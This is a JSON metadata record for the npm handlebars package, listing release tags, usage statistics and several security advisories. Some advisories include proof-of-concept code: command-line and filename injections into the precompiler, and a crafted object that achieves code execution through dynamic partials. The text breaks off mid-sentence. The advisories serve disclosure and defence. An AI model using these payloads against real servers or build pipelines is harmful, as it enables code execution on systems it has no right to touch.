api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2024-10-29T21:57:10.683Z","dependent_packages_count":15556,"downloads":160140957,"downloads_period":"last-month","dependent_repos_count":1258975,"rankings":{"downloads":0.027434586854835446,"dependent_repos_count":0.027626245645238485,"dependent_packages_count":0.006516398873703429,"stargazers_count":0.7289331395571697,"forks_count":0.8664620115849524,"docker_downloads_count":0.029241655450064123,"average":0.28103567299432725},"purl":"pkg:npm/handlebars","advisories":[{"uuid":"GSA_kwCzR0hTQS03cngzLTI4Y3ItdjV3aM4ABUbZ","url":"https://github.com/advisories/GHSA-7rx3-28cr-v5wh","title":"Handlebars.js has a Prototype Method Access Control Gap via Missing __lookupSetter__ Blocklist Entry","description":"## Summary\n\nThe prototype method blocklist in `lib/handlebars/internal/proto-access.js` blocks `constructor`, `__defineGetter__`, `__defineSetter__`, and `__lookupGetter__`, but omits the symmetric `__lookupSetter__`. This omission is only exploitable when the non-default runtime option `allowProtoMethodsByDefault: true` is explicitly set — in that configuration `__lookupSetter__` becomes accessible while its counterparts remain blocked, creating an inconsistent security boundary.\n\n`4.6.0` is the version that introduced `protoAccessControl` and the `allowProtoMethodsByDefault` runtime option.\n\n## Description\n\nIn `lib/handlebars/internal/proto-access.js`:\n\n```javascript\nconst methodWhiteList = Object.create(null);\nmethodWhiteList['constructor']      = false;\nmethodWhiteList['__defineGetter__'] = false;\nmethodWhiteList['__defineSetter__'] = false;\nmethodWhiteList['__lookupGetter__'] = false;\n// __lookupSetter__ intentionally blocked in CVE-2021-23383,\n// but omitted here — creating an asymmetric blocklist\n```\n\nAll four legacy accessor helpers (`__defineGetter__`, `__defineSetter__`, `__lookupGetter__`, `__lookupSetter__`) were involved in the exploit chain addressed by CVE-2021-23383. Three of the four were explicitly blocked; `__lookupSetter__` was left out.\n\nWhen `allowProtoMethodsByDefault: true` is set, any prototype method **not present** in `methodWhiteList` is permitted by default. Because `__lookupSetter__` is absent from the list, it passes the `checkWhiteList` check and is accessible in templates, while `__lookupGetter__` (its sibling) is correctly denied.\n\n## Workarounds\n\n- Do **not** set `allowProtoMethodsByDefault: true`. The default configuration is not affected.\n- If `allowProtoMethodsByDefault` must be enabled, ensure templates do not reference  `__lookupSetter__` through untrusted input.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-29T15:17:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh","https://github.com/advisories/GHSA-765h-qjxv-5f44","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://github.com/advisories/GHSA-7rx3-28cr-v5wh"],"source_kind":"github","identifiers":["GHSA-7rx3-28cr-v5wh"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-29T16:00:09.697Z","updated_at":"2026-04-05T20:00:20.107Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cngzLTI4Y3ItdjV3aM4ABUbZ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03cngzLTI4Y3ItdjV3aM4ABUbZ","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.6.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03cngzLTI4Y3ItdjV3aM4ABUbZ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00NDJqLTM5d20tMjhyMs4ABUbY","url":"https://github.com/advisories/GHSA-442j-39wm-28r2","title":"Handlebars.js has a Property Access Validation Bypass in container.lookup","description":"## Summary\n\nIn `lib/handlebars/runtime.js`, the `container.lookup()` function uses `container.lookupProperty()` as a gate check to enforce prototype-access controls, but then discards the validated result and performs a second, unguarded property access (`depths[i][name]`). This Time-of-Check Time-of-Use (TOCTOU) pattern means the security check and the actual read are decoupled, and the raw access bypasses any sanitization that `lookupProperty` may perform.\n\nOnly relevant when the **compat** compile option is enabled (`{compat: true}`), which activates `depthedLookup` in `lib/handlebars/compiler/javascript-compiler.js`.\n\n## Description\n\nThe vulnerable code in `lib/handlebars/runtime.js` (lines 137–144):\n\n```javascript\nlookup: function (depths, name) {\n  const len = depths.length;\n  for (let i = 0; i \u003c len; i++) {\n    let result = depths[i] \u0026\u0026 container.lookupProperty(depths[i], name);\n    if (result != null) {\n      return depths[i][name];  // BUG: should be `return result;`\n    }\n  }\n},\n```\n\n`container.lookupProperty()` (lines 119–136) enforces `hasOwnProperty` checks and `resultIsAllowed()` prototype-access controls. However, `container.lookup()` only uses `lookupProperty` as a boolean gate — if the gate passes (`result != null`), it then performs an independent, raw `depths[i][name]` access that circumvents any transformation or wrapped value that `lookupProperty` may have returned.\n\n## Workarounds\n\n- Avoid enabling `{ compat: true }` when rendering templates that include untrusted data.\n- Ensure context data objects are plain JSON (no Proxies, no getter-based accessor properties).","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-03-29T15:16:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://github.com/advisories/GHSA-442j-39wm-28r2"],"source_kind":"github","identifiers":["GHSA-442j-39wm-28r2"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-29T16:00:09.697Z","updated_at":"2026-04-05T20:00:20.108Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00NDJqLTM5d20tMjhyMs4ABUbY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00NDJqLTM5d20tMjhyMs4ABUbY","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00NDJqLTM5d20tMjhyMs4ABUbY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14anBqLTNtcjctZ2NwZs4ABUYt","url":"https://github.com/advisories/GHSA-xjpj-3mr7-gcpf","title":"Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options","description":"## Summary\n\nThe Handlebars CLI precompiler (`bin/handlebars` / `lib/precompiler.js`) concatenates user-controlled strings — template file names and several CLI options — directly into the JavaScript it emits, without any escaping or sanitization. An attacker who can influence template filenames or CLI arguments can inject arbitrary JavaScript that executes when the generated bundle is loaded in Node.js or a browser.\n\n## Description\n\n`lib/precompiler.js` generates JavaScript source by string-interpolating several values directly into the output. Four distinct injection points exist:\n\n### 1. Template name injection\n\n```javascript\n// Vulnerable code pattern\noutput += 'templates[\"' + template.name + '\"] = template(...)';\n```\n\n`template.name` is derived from the file system path. A filename containing `\"` or `'];` breaks out of the string literal and injects arbitrary JavaScript.\n\n### 2. Namespace injection (`-n` / `--namespace`)\n\n```javascript\n// Vulnerable code pattern\noutput += 'var templates = ' + opts.namespace + ' = ' + opts.namespace + ' || {};';\n```\n\n`opts.namespace` is emitted as raw JavaScript. Anything after a `;` in the value becomes an additional JavaScript statement.\n\n### 3. CommonJS path injection (`-c` / `--commonjs`)\n\n```javascript\n// Vulnerable code pattern\noutput += 'var Handlebars = require(\"' + opts.commonjs + '\");';\n```\n\n`opts.commonjs` is interpolated inside double quotes with no escaping, allowing `\"` to close the string and inject further code.\n\n### 4. AMD path injection (`-h` / `--handlebarPath`)\n\n```javascript\n// Vulnerable code pattern\noutput += \"define(['\" + opts.handlebarPath + \"handlebars.runtime'], ...)\";\n```\n\n`opts.handlebarPath` is interpolated inside single quotes, allowing `'` to close the array element.\n\nAll four injection points result in code that executes when the generated bundle is `require()`d or loaded in a browser.\n\n## Proof of Concept\n\n**Template name vector (creates a file `pwned` on disk):**\n\n```bash\nmkdir -p templates\nprintf 'Hello' \u003e \"templates/evil'] = (function(){require(\\\"fs\\\").writeFileSync(\\\"pwned\\\",\\\"1\\\")})(); //.handlebars\"\n\nnode bin/handlebars templates -o out.js\nnode -e 'require(\"./out.js\")'  # Executes injected code, creates ./pwned\n```\n\n**Namespace vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n  -n \"App.ns; require('fs').writeFileSync('pwned2','1'); //\"\nnode -e 'require(\"./out.js\")'\n```\n\n**CommonJS vector:**\n\n```bash\nnode bin/handlebars templates -o out.js \\\n  -c 'handlebars\"); require(\"fs\").writeFileSync(\"pwned3\",\"1\"); //'\nnode -e 'require(\"./out.js\")'\n```\n\n**AMD vector:**\n\n```bash\nnode bin/handlebars templates -o out.js -a \\\n  -h \"'); require('fs').writeFileSync('pwned4','1'); // \"\nnode -e 'require(\"./out.js\")'\n```\n\n## Workarounds\n\n- **Validate all CLI inputs** before invoking the precompiler. Reject filenames and option values  that contain characters with JavaScript string-escaping significance (`\"`, `'`, `;`, etc.).\n- **Use a fixed, trusted namespace string** passed via a configuration file rather than  command-line arguments in automated pipelines.\n- **Run the precompiler in a sandboxed environment** (container with no write access to sensitive  paths) to limit the impact of successful exploitation.\n- **Audit template filenames** in any repository or package that is consumed by an automated  build pipeline.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-27T18:22:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf","https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2","https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","https://nvd.nist.gov/vuln/detail/CVE-2026-33941","https://github.com/advisories/GHSA-xjpj-3mr7-gcpf"],"source_kind":"github","identifiers":["GHSA-xjpj-3mr7-gcpf","CVE-2026-33941"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-07-01T15:01:56.951Z","epss_percentage":0.00291,"epss_percentile":0.20732,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14anBqLTNtcjctZ2NwZs4ABUYt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14anBqLTNtcjctZ2NwZs4ABUYt","packages":[{"ecosystem":"npm","package_name":"handlebars","versions":[{"first_patched_version":"4.7.9","vulnerable_version_range":"\u003e= 4.0.0, \u003c= 4.7.8"}],"purl":"pkg:npm/handlebars"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14anBqLTNtcjctZ2NwZs4ABUYt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14aHB2LWhjNmctcjljNs4ABUYs","url":"https://github.com/advisories/GHSA-xhpv-hc6g-r9c6","title":"Handlebars.js has JavaScript Injection via AST Type Confusion when passing an object as dynamic partial","description":"## Summary\n\nA crafted object placed in the template context can bypass all conditional guards in `resolvePartial()` and cause `invokePartial()` to return `undefined`. The Handlebars runtime then treats the unresolved partial as a source that needs to be compiled, passing the crafted object to `env.compile()`. Because the object is a valid Handlebars AST containing injected code, the generated JavaScript executes arbitrary commands on the server. The attack requires the adversary to control a value that can be returned by a dynamic partial lookup.\n\n## Description\n\nThe vulnerable code path spans two functions in `lib/handlebars/runtime.js`:\n\n**`resolvePartial()`:** A crafted object with `call: true` satisfies the first branch condition (`partial.call`) and causes an early return of the original object itself, because none of the remaining conditionals (string check, `options.partials` lookup, etc.) match a plain object. The function returns the crafted object as-is.\n\n**`invokePartial()`:** When `resolvePartial` returns a non-function object, `invokePartial` produces `undefined`. The runtime interprets `undefined` as \"partial not yet compiled\" and calls `env.compile(partial, ...)` where `partial` is the crafted AST object. The JavaScript code generator processes the AST and emits JavaScript containing the injected payload, which is then evaluated.\n\n**Minimum prerequisites:**\n1. The template uses a dynamic partial lookup: `{{\u003e (lookup . \"key\")}}` or equivalent.\n2. The adversary can set the value of the looked-up context property to a crafted object.\n\nIn server-side rendering scenarios where templates process user-supplied context data, this enables full Remote Code Execution.\n\n## Proof of Concept\n\n```javascript\nconst Handlebars = require('handlebars');\n\nconst vulnerableTemplate = `{{\u003e (lookup . \"payload\")}}`;\n\nconst maliciousContext = {\n  payload: {\n    call: true, // bypasses the primary resolvePartial branch\n    type: \"Program\",\n    body: [\n      {\n        type: \"MustacheStatement\",\n        depth: 0,\n        path: {\n          type: \"PathExpression\",\n          parts: [\"pop\"],\n          original: \"this.pop\",\n          // Injected code breaks out of the generated function's argument list\n          depth: \"0])),function () {console.error('VULNERABLE: object -\u003e dynamic partial -\u003e RCE');}()));//\",\n        },\n      },\n    ],\n  },\n};\n\nHandlebars.compile(vulnerableTemplate)(maliciousContext);\n// Prints: VULNERABLE: object -\u003e dynamic partial -\u003e RCE\n```\n\n## Workarounds\n\n- **Use the runtime-only build** (`require('handlebars/runtime')`). Without `compile()`,  the fallback compilation path in `invokePartial` is unreachable.\n- **Sanitize context data** before rendering: ensure no value in the context is a non-primitive  object that could be passed to a dynamic partial.\n- **Avoid dynamic partial lookups** (`{{\u003e (lookup ...)}}`) when context data is 